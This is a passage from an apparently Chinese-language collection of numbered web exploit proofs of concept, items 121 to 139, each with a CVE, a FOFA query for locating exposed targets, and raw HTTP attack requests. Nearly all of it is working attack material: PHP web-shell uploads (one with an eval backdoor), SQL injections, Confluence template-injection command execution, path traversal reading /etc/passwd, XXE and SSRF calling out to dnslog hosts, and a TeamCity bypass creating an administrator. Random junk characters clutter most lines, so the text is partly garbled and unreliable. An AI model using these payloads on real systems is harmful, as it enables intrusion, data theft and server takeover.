Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db1 E3 Q8 R- d$ {9 e
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko8 u/ J, z' Z3 ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( \8 X( Q! h7 T' g) ? J
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 ^7 @) z5 T4 A6 a9 |7 [
Accept-Encoding: gzip, deflate7 L( s2 R. m9 { x1 {* J7 x
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
. a$ F+ }: O2 o8 Y. W9 ?& J+ [0 NContent-Length: 597
" j# A2 T5 e- W0 k1 U2 o6 UOrigin: https://ip:port* R2 ?/ v a3 W8 \' U
Referer: https://ip:port/sysmanage/licence.php
3 S8 r5 H4 z, }& s3 DUpgrade-Insecure-Requests: 11 ~! ?- Q; q5 _
Sec-Fetch-Dest: document. |4 O& x7 k% d' W2 ]$ g4 i
Sec-Fetch-Mode: navigate7 N/ U. C, t0 G; w- R8 k7 l
Sec-Fetch-Site: same-origin
* c; X: u3 S& \/ V& {% G& mSec-Fetch-User: ?1
( q F4 e6 j o7 P7 K; q! RTe: trailers
5 m/ v' O$ ^3 z; p) L# \! pConnection: close
2 M$ }2 \' O6 D$ x9 f
$ W8 e' O( D( b' H) _! ]+ P3 ~6 @: j-----------------------------42328904123665875270630079328
4 s( C. I9 Z& o# N8 KContent-Disposition: form-data; name="file_upload"; filename="2.php"8 z* E3 x- f: T( o) T. K
Content-Type: application/octet-stream
& I) ^0 g7 V, u' h- i1 J% o3 U
. ?& [+ A0 p2 m' s' e5 E<?php phpinfo()?>
. [- o& q8 F. Y7 E8 |-----------------------------423289041236658752706300793283 }0 ]4 ^8 K' ~$ S) ]; g% @
Content-Disposition: form-data; name="id_type"4 \; }5 W4 B, t# I) B" B
+ S2 S5 L& w- z J! S2 I8 I# O& n# ?
1
" R% Z. g- i% B2 @: X-----------------------------42328904123665875270630079328
- H; @ S: U4 E! QContent-Disposition: form-data; name="1_ck"
8 q5 E1 p$ s' v" a5 S5 a- { T7 U0 L9 m* X: H
1_radhttp
s# L' _2 W( `# K6 m-----------------------------42328904123665875270630079328. a0 B* E( R9 g) U
Content-Disposition: form-data; name="mode"
$ L; ~ }# |/ N
7 b- C* ~3 G6 H( Timport
; p& u! i' G9 L7 V9 y7 @" y-----------------------------42328904123665875270630079328
9 M2 h: ^: r2 r; ^- N* ~" b9 ~
! I% Z# \# v# |. T% U6 _# G( c/ T8 x f- @& M
文件路径/upload/2.php
; C" T9 ], L+ _9 Q4 V$ @% D4 y$ k5 j" ]
121. 北京百绰智能S42管理平台userattestation.php任意文件上传5 ~8 C) P& t9 W5 O9 f9 H' [( s
CVE-2024-19189 r G5 n- `' ]" X% R
FOFA:title="Smart管理平台"
" w/ \ w% s, ?& @, _* tPOST /useratte/userattestation.php HTTP/1.1 A& |' Z y A) g% e" y8 d M
Host: 192.168.40.130:84430 D2 r( l5 _+ H- T+ q
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
% M, o( s( e9 q/ \1 tUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
- O( G% j5 f. x! N5 K0 xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' {( q( V4 [( I
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# W3 \1 @) a' yAccept-Encoding: gzip, deflate: Y+ v; o* |# v
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328$ k1 s0 E' v/ o* y. V
Content-Length: 592
& A- Q9 A- n- Z6 aOrigin: https://192.168.40.130:84435 r! j( X* U9 M: {
Upgrade-Insecure-Requests: 1
: P# c8 P" `# l& ]6 q5 y0 b* ^) B8 fSec-Fetch-Dest: document
d2 K; Q. ^) ^/ pSec-Fetch-Mode: navigate
3 c P/ K/ `- y3 x7 n0 E; YSec-Fetch-Site: same-origin
& l O. n/ W+ J/ ASec-Fetch-User: ?1" ?: j- @& e8 _& F5 W4 \( D* J/ `/ Y
Te: trailers& W+ \% t0 W3 x1 d4 Z0 o4 M
Connection: close1 c2 b) Q& m3 L; K
- W& ^, w i/ g; j-----------------------------42328904123665875270630079328& ]* u- ?5 V0 k7 ?0 S. S
Content-Disposition: form-data; name="web_img"; filename="1.php"
' r& d& j1 ~2 |% BContent-Type: application/octet-stream
# L$ [% W* r5 m S& F% V8 F, L: o2 O/ I' T' v
<?php phpinfo();?>
' R$ Z4 a6 F4 {0 w5 `-----------------------------42328904123665875270630079328
( S s9 ~% E. c; r4 l+ Z% R% F7 ZContent-Disposition: form-data; name="id_type"
# J! @, Q& V$ ~
# l7 H) Q4 `: O( \- Y/ G1
$ R, }, ^( b+ R- @8 W( j! [-----------------------------42328904123665875270630079328
/ @- e. K4 O& O! x6 H5 \* K$ x! MContent-Disposition: form-data; name="1_ck"" M# L! D3 [ A9 }# K
" Z+ ~% F+ s2 P5 l. I$ m: r# q
1_radhttp
; d# q7 Y3 t% ~7 E* J-----------------------------42328904123665875270630079328" W/ u! V! R, T- K6 w- V4 h; A4 o# I a
Content-Disposition: form-data; name="hidwel"
* q; {8 I$ V2 G9 ]5 z5 i7 }
& i; T% f C- M* O9 k4 z5 xset
: _2 }! J# D, t-----------------------------42328904123665875270630079328
/ K/ |' I8 \% Z( k; Y% K; [* Z8 Q3 w9 O% F
. q' ?2 V# ]6 E! _- g+ K: Sboot/web/upload/weblogo/1.php6 [" U ?- X+ I! T$ v* `% H6 @+ r0 N/ V
5 c1 O0 M5 E! U: A
122. 北京百绰智能s200管理平台/importexport.php sql注入 s% C. J. U) C' g" ]
CVE-2024-27718FOFA:title="Smart管理平台"& W% E7 `# H2 j. H+ a
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
j' u8 t0 Y, @* @' X8 d4 N4 ^GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
3 k6 A+ Y6 G5 _ |# WHost: x.x.x.x
3 U1 S6 V. m% w3 tCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
! c) E+ D4 n0 q: G+ QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
& I5 D4 \7 t2 S8 aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; a0 b; V' i# Z' x" ]! Y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( c5 X+ W! h# K) ^* S, `" BAccept-Encoding: gzip, deflate, br# c! k8 s* K0 V4 J0 S' i3 Y9 M* w
Upgrade-Insecure-Requests: 1
, }9 d- U# ]- F Q' y, oSec-Fetch-Dest: document
7 A4 m* R" k9 q" rSec-Fetch-Mode: navigate
/ y# q! ]6 @/ x+ PSec-Fetch-Site: none% h% M: r; _, j) B- [
Sec-Fetch-User: ?1* X; I0 d* o, {1 T
Te: trailers( v. D" h4 f/ {/ ?! I$ B5 H
Connection: close
8 [" a9 e4 V8 }7 b; d) H A6 G& X: ~, |: {$ d9 c) Y! p/ R/ `- z
; E1 ~7 P% F* o& g8 A" s$ `9 o
123. Atlassian Confluence 模板注入代码执行
( W5 s% P) d2 E* E% BFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
6 b$ Y2 ?. K! l5 ?POST /template/aui/text-inline.vm HTTP/1.1
, [/ a3 D! l- N; C: |- bHost: localhost:8090" f' ~: W; [5 Z8 ?
Accept-Encoding: gzip, deflate, br
& M* r# W- p! d7 @" H! PAccept: */*
) v1 V' V5 B( u! [Accept-Language: en-US;q=0.9,en;q=0.8& }3 N4 f3 |; x5 p/ J+ X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36: p2 ^9 y k% F- |) t" r; t$ a
Connection: close
h. Q% d: _* o. _/ E/ oContent-Type: application/x-www-form-urlencoded
2 x& Y4 Y2 s/ c+ ]7 T, |: W
( }+ R: U1 G; J/ Xlabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))! M0 y% N, b2 O: |6 t# i3 F
v; R, C e- w
( _9 d2 t0 x7 \ ~# W, [: d124. 湖南建研工程质量检测系统任意文件上传0 m( }9 V9 d& o+ z# b
FOFA:body="/Content/Theme/Standard/webSite/login.css"0 `+ K4 F2 Y+ q0 C
POST /Scripts/admintool?type=updatefile HTTP/1.17 S% @, ]7 t6 X# C9 y
Host: 192.168.40.130:8282
' \ p# u& s4 IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Q; v k) S# B9 W# [* RContent-Length: 72
2 @! R% x$ s7 S* j: Q( TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8- ^4 y5 V7 J+ P8 G1 d
Accept-Encoding: gzip, deflate, br4 {& e8 {2 a: e' n* H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) Q5 g' i4 h/ n" H, K
Connection: close$ S' r2 \. `5 D6 _1 n
Content-Type: application/x-www-form-urlencoded
$ s G1 d p/ \9 U1 g& x3 F4 f' s+ ~3 b
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
6 N4 X$ i) \# G( [3 U& ^7 x b
( t/ n6 s. t' Q) z
- }- i/ E" F2 }, n, _5 yhttp://192.168.40.130:8282/Scripts/abcgcg.aspx
& V- |3 G) i/ m5 D2 Q3 ?+ Q; E P
4 a# k& j. p: {5 Z, `& c125. ConnectWise ScreenConnect身份验证绕过3 o. k$ G" @2 p$ o& D l) I4 }) ?
CVE-2024-1709
- ~3 T0 G$ V4 \7 vFOFA:icon_hash="-82958153"1 T9 N0 p" ?& f" n+ v' a' ]
https://github.com/watchtowrlabs ... bypass-add-user-poc
# K4 V4 b+ ]! Q# @# Q5 G/ G# ?6 z- J
5 O, A% }" C/ o+ O# }# V7 F. }: z6 P) Z j% n
使用方法3 V$ |$ ~% b6 ?1 z0 k
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
' ]4 O9 b3 ?) b& j* X* z; i3 D( E+ S& N9 L/ ]
# I' o% `7 \" V+ l! V! i ~创建好用户后直接登录后台,可以执行系统命令。: U7 T" g, v- Q- |6 [# N0 W
! O" W/ f% |" A" k
126. Aiohttp 路径遍历
$ }6 b4 L+ h0 XFOFA:title=="ComfyUI"
% \+ |, y: {! KGET /static/../../../../../etc/passwd HTTP/1.1
]5 `+ r* }$ D% v$ LHost: x.x.x.x
, @$ e4 b* D' c$ ?- h. o6 |# yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.365 U& k& I" U# p+ p4 [9 u, n* A
Connection: close/ v1 y- c) F/ ~- Z F2 L& x
Accept: */*
7 j S; K4 c( MAccept-Language: en C" P# j3 }' ]: G
Accept-Encoding: gzip0 C' @4 I0 w+ w% E
& y4 q( U- F r9 u
7 M9 V7 d$ P4 f7 T& D' n127. 广联达Linkworks DataExchange.ashx XXE
' j. N. U8 {1 K+ M$ v9 b0 yFOFA:body="Services/Identification/login.ashx"
: S- U' ~+ C' ~" b% vPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
% O$ [1 M" q' O. \( s5 A- U2 tHost: 192.168.40.130:8888
# L( ^# i% ]# w1 [7 p! qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36/ ^; w* i5 J+ a7 n" u
Content-Length: 415
7 {. J7 P7 o8 R6 {6 k& xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 H" q# q7 u1 @Accept-Encoding: gzip, deflate
5 T( ?7 O# j5 |Accept-Language: zh-CN,zh;q=0.9
4 Q) G6 K4 U& l6 I# @5 B* WConnection: close; k! O- a. ], O) l
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0, X8 h) P2 I6 J; n
Purpose: prefetch7 d8 d5 Z5 K5 h; s3 g
Sec-Purpose: prefetch;prerender9 M2 c; Z7 z# W8 C
- i7 |9 J1 ^7 Z& A
------WebKitFormBoundaryJGgV5l5ta05yAIe0 f7 a4 n1 Q& J; r9 S7 `9 ?
Content-Disposition: form-data;name="SystemName"
3 W% K% N, u& j5 a: { W
: v8 z' y& |/ E( l ?. a1 _BIM
$ T" d7 r; I3 O9 N, c- I" e------WebKitFormBoundaryJGgV5l5ta05yAIe0" w6 [& p. W7 A& V
Content-Disposition: form-data;name="Params" ?; q- s5 ~. `
Content-Type: text/plain+ o7 w% ^: g8 _3 b, K
6 m( K: n. _ X5 b& d<?xml version="1.0" encoding="UTF-8"?>/ Z# A m9 ?4 c) |
<!DOCTYPE test [! u9 f" P$ b2 D# h# H* m
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
, m$ a% I# R, d% z# r) U+ }2 E]/ e$ ?. i+ F9 l" A7 q% y7 x
>
" s6 e3 a9 b7 g<test>&t;</test>
5 G [' L) C k& K1 g* L------WebKitFormBoundaryJGgV5l5ta05yAIe0--
* D" F" c1 U, T; n0 j/ n. a& v% Z0 D2 M7 Q: s
" u6 m d) @: y+ s( k
. ^1 [2 E! c% R* D$ t128. Adobe ColdFusion 反序列化- F; N6 ~1 {; v" m# Y9 @ _5 x
CVE-2023-382031 J' d \% P' t) A4 i+ `9 T
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
4 d0 A' G/ F8 {4 c- x; M2 MFOFA:app="Adobe-ColdFusion"1 B$ ?0 Z7 x5 ~' ^1 Z% @
PAYLOAD
, _9 c" _/ k4 ~ O5 C
: |2 K f5 K* K4 o9 ?+ g6 y129. Adobe ColdFusion 任意文件读取
7 K4 _; H, q1 l. h5 h5 c A+ mCVE-2024-20767
" M1 V2 h5 \7 b1 T: }; wFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
3 q9 ? H+ B' b& T8 n$ K! [: H第一步,获取uuid
4 d# X2 \) v" b S6 k' K; CGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1' N! Q, [6 c5 C2 c
Host: x.x.x.x( T# u4 [, O* S& ]8 k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
' U% i0 X/ k) I% ~: dAccept: */*
$ u8 y) o+ t0 L7 [2 _6 _Accept-Encoding: gzip, deflate) u$ u$ |" V9 I9 ?# A0 X) x
Connection: close1 z* w- P0 G. n, ~3 ~
$ ]7 s$ V/ J" w* ~0 o" m
/ M: j* i/ k0 l, D6 b第二步,读取/etc/passwd文件
. m# W! X! z3 t- I% N) P) u2 oGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1& A- a; S& [/ m
Host: x.x.x.x1 t/ B `8 C3 h7 w S8 P! V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
/ _; @( _! E9 f% }+ k( l E- [) NAccept: */*
: { ^ O6 z Q. A3 a$ v* xAccept-Encoding: gzip, deflate
, b0 H- T) j9 OConnection: close9 o% D4 X0 ^2 F1 R: n" c
uuid: 85f60018-a654-4410-a783-f81cbd5000b9 S" g& a. a+ J- c& T5 e' |
! m4 b, M X, i, b- \+ L
9 N+ N r8 W; W9 z+ |5 Z130. Laykefu客服系统任意文件上传
) U9 J7 t" a f& ]% D* d/ wFOFA:icon_hash="-334624619"5 b2 J+ t8 Q* j2 @4 w
POST /admin/users/upavatar.html HTTP/1.1
3 [% C3 J. Y5 zHost: 127.0.0.1* v1 U5 M- X$ H5 R! t4 ?
Accept: application/json, text/javascript, */*; q=0.01! P7 L: y; X" z8 ?
X-Requested-With: XMLHttpRequest
' @( d: m6 L7 w! q- s+ PUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26# f a% c3 |! v
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
8 r6 F) p( e: l9 MAccept-Encoding: gzip, deflate
7 w c9 A) x* n5 j+ xAccept-Language: zh-CN,zh;q=0.9
& D' Z2 K+ D4 Z5 g1 uCookie: user_name=1; user_id=3
* |$ r& P( V1 o5 u1 z6 MConnection: close
: @% ?. Q1 H, U' L3 o! X) h" ]
% S4 J8 S8 U2 m1 k------WebKitFormBoundary3OCVBiwBVsNuB2kR R2 i1 w: t. j
Content-Disposition: form-data; name="file"; filename="1.php" D/ \; l' C" x8 h8 ~" s; ?* O- l) a
Content-Type: image/png6 X" J8 ^" ?- r0 P. Z- l; P, i: a
: N0 [5 G7 \" C1 e<?php phpinfo();@eval($_POST['sec']);?>" S6 `+ g) t. |
------WebKitFormBoundary3OCVBiwBVsNuB2kR--0 V$ [; R& w# f* L9 o8 O& _. s
9 }% Y! E" Y% |( L8 K: a
- Z/ R- A9 }% P131. Mini-Tmall <=20231017 SQL注入0 U- q% f* o3 R" s& X( ^6 `
FOFA:icon_hash="-2087517259"8 b2 X% A. D3 o
后台地址:http://localhost:8080/tmall/admin
4 l) A/ `. I( F8 a( g( Vhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)7 F! ~8 _! W7 O7 O/ U
3 i* U; d8 Q# I' H9 ?& Y
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过3 \+ z# C' m9 m) s8 J
CVE-2024-27198
6 m; T m5 g8 r# a0 AFOFA:body="Log in to TeamCity". L$ p! m4 G' E, s6 d% O
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.19 y5 @3 v" J3 \3 \
Host: 192.168.40.130:8111; G4 u& [$ c) `/ g5 I# Q& G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" q. d% z) B6 z; _* G- |( j2 F
Accept: */*
4 P( I% _1 s% P/ k- {Content-Type: application/json0 H- I- v9 L6 v% [8 ?4 m c$ `
Accept-Encoding: gzip, deflate% U" k& W5 A+ n+ h! o6 T
; N5 D( r @* O* U: `% i: `7 R
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}% p7 G0 i0 s3 s8 `& `2 E
" _1 ?( \$ F! G8 I0 x( ?3 j" }7 D+ p# m% N
CVE-2024-27199' A, v: N6 z$ ?7 E: [3 @
/res/../admin/diagnostic.jsp
' K0 C& e+ z* l" {: Y/.well-known/acme-challenge/../../admin/diagnostic.jsp% ?7 i D8 a# J7 P% k
/update/../admin/diagnostic.jsp: J( Q" |# \9 d8 B* b. r
. [8 X( V0 i5 f) x0 H7 V7 d9 N8 u9 s0 j+ x$ V$ T
CVE-2024-27198-RCE.py& x: `5 r9 F& o) s9 c8 [2 Z5 t
! F8 k) s w) }( |3 b9 \ L% f
133. H5 云商城 file.php 文件上传
7 ~! T/ s6 Y$ x; J8 F8 d" rFOFA:body="/public/qbsp.php"
, Q: H. v# |# F/ m% V8 RPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1! S3 v7 h- b3 Q! S
Host: your-ip
7 \. r" J# i& Q3 mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.365 p2 ~) K( M' ]* ~, l, v
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx% h- `7 C' i3 k( t
- @ }: Y6 n7 e! s5 m% p- T8 y3 c------WebKitFormBoundaryFQqYtrIWb8iBxUCx
+ P2 ^7 Z3 a Q5 t* |Content-Disposition: form-data; name="file"; filename="rce.php"" [5 M: N1 g" B- L6 r: s8 P2 r
Content-Type: application/octet-stream
8 C) D8 ~: z" J4 E / k1 |, r; m U) _$ J
<?php system("cat /etc/passwd");unlink(__FILE__);?>
. {1 R# ~% g2 U/ V6 S4 A& ^3 B% D------WebKitFormBoundaryFQqYtrIWb8iBxUCx--7 b6 X/ u0 I g% v
, r0 j: [ w1 e+ E
2 U( g2 ^ t, v N
9 m% z; c8 V. l, U. p134. 网康NS-ASG应用安全网关index.php sql注入
" }! s9 q+ q/ T2 m2 z. OCVE-2024-2330
$ Q8 F; o4 z) {2 GNetentsec NS-ASG Application Security Gateway 6.3版本
4 [6 m3 W+ m* g( m/ nFOFA:app="网康科技-NS-ASG安全网关"
, K; ^* X0 U/ k0 B1 | O: c5 H3 fPOST /protocol/index.php HTTP/1.19 z: m& N2 ]" N9 x$ u4 ~
Host: x.x.x.x
3 U. \2 L3 q- R8 b; b" T0 ^Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
1 F3 ^9 C6 S- Q* s; {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
( _: F8 G8 F' q7 I& u9 _+ K$ vAccept: */*
; n( W' ?% G# f# h" J4 OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 K4 s& A& J% b0 r z# J0 tAccept-Encoding: gzip, deflate
- Q s* I9 ]3 F' e4 m! Z- HSec-Fetch-Dest: empty
1 O8 d7 G( J4 W- c2 e( e6 hSec-Fetch-Mode: cors
4 x3 n! z$ i% g1 U* w% xSec-Fetch-Site: same-origin
5 s {) s7 e6 j! m9 F% P7 i2 r" \Te: trailers# U- C4 B0 j ]0 n, ]' \3 J) R& ~
Connection: close
: U$ I6 U8 g# U; MContent-Type: application/x-www-form-urlencoded1 O$ ?0 o3 a5 k, }! F+ J
Content-Length: 263
; E$ S0 ^- i7 {) j8 ~$ O- `
4 }7 H! q5 f% e, B/ Xjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}( e! ?! D G: N) R# n, M1 m% S7 d
k9 F2 }2 m- { c n! D! K I0 V2 [( i
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入) X& I8 {: Q1 {+ [9 \! J5 x
CVE-2024-20222 ^4 }# z& y; ?+ f: l
Netentsec NS-ASG Application Security Gateway 6.3版本- F1 d8 T) I4 [' Z+ `
FOFA:app="网康科技-NS-ASG安全网关"7 F. w, `* c& w9 {* d, i" u
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.19 F, S- e& U! w
Host: x.x.x.x
8 m: [7 h6 W& B; Y4 g. K6 \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
! f6 X; U' X" o1 ~) w% wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 X: ^' R' ~, a- t1 B7 yAccept-Encoding: gzip, deflate
# |8 i( W% ~) f) W: fAccept-Language: zh-CN,zh;q=0.9
) K& D5 ^& J: TConnection: close2 U3 _: l% |9 I5 J6 E7 \
3 z$ ]) Y3 s, ]) ~2 f" n% C' u! y3 k
136. NextChat cors SSRF
* M- L' G7 |0 V5 U, @$ I1 k1 JCVE-2023-49785" h/ |- I0 @+ _6 o& l9 |$ ~ k
FOFA:title="NextChat"
0 l0 C U8 r! c& M4 T" A7 IGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
1 ~9 f( ?; G3 } E4 iHost: x.x.x.x:10000
/ q. z) h- w9 G" W) Z: \' d! @User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
; ]5 j6 e2 ]. p: `, SConnection: close
4 e/ F: k; r' nAccept: */*. r+ ^# c/ ^1 w) _% f4 l6 I) i
Accept-Language: en
m8 a+ d* j! e |9 Z+ r" oAccept-Encoding: gzip, ]* |. N# p9 f7 `1 s
9 @6 X( Z* h( y9 m- A
" }/ }9 c' u0 v( X7 R# E+ R
137. 福建科立迅通信指挥调度平台down_file.php sql注入' r6 m G6 S! Y+ z2 c7 C1 {
CVE-2024-26203 G: u8 g0 H1 w% {% W) r3 i0 p
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台". `! e" l6 T* d
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
0 A1 l; K+ m- t. z3 eHost: x.x.x.x
& \$ L3 E9 M s; B7 `) h/ CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
' j4 N: y- j! Z3 y% ]$ bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 j! z0 q8 E) B$ ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- k' Y$ B! [' Q& N& ~Accept-Encoding: gzip, deflate, br
$ t9 ?6 m2 B- j7 e0 K; TConnection: close8 x+ `- E$ T. l) K0 J h
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
6 e9 {; q0 i% Z0 EUpgrade-Insecure-Requests: 1+ v% U! o. r, E3 s/ }, N
# A& w( g, N4 V8 K5 q1 a, S8 ~4 |! u
7 c: ]- O) M" @* |138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
c7 r, b8 x& d7 f8 gCVE-2024-2621% c4 t+ ^: i2 b. R
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"9 y$ F8 L% o% R7 j w
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1+ t4 X! V2 j; D
Host: x.x.x.x ~$ U3 j& o9 C8 v9 j7 L8 b& I# p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.07 v# y0 X \& Q( u! y( Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 U3 d3 z# M! L) i: k8 p% BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 W, W" L% B! c/ o0 [& oAccept-Encoding: gzip, deflate, br
3 @/ I( q1 L0 p5 O4 y+ v: `Connection: close( W( r& a9 Y( q& B9 L" r) h/ v
Upgrade-Insecure-Requests: 13 p2 s' S; @7 t! j
1 }- C9 x/ ?3 Y8 h2 p7 J1 ?2 s
# r5 _# y0 Q5 v
139. 福建科立讯通信指挥调度平台editemedia.php sql注入9 W z: @9 r3 x( i
CVE-2024-2622+ x8 }" i! U3 F/ B9 S: q
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
* T' e5 D* U) u* N+ I' A+ BGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.14 }+ A! `' w( [" _# a- {
Host: x.x.x.x
0 D: f. V I; _0 }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
. M# U3 R N' b) ?# CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, r3 G4 g4 F$ v) k% q4 P
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; G+ c/ k$ V# \1 `) |7 f7 y1 l
Accept-Encoding: gzip, deflate, br
% B- _+ R9 p6 k+ h' s) a1 XConnection: close
( s) Z2 H2 Y3 I( pCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk) `1 j3 K6 Z& @2 Q& k
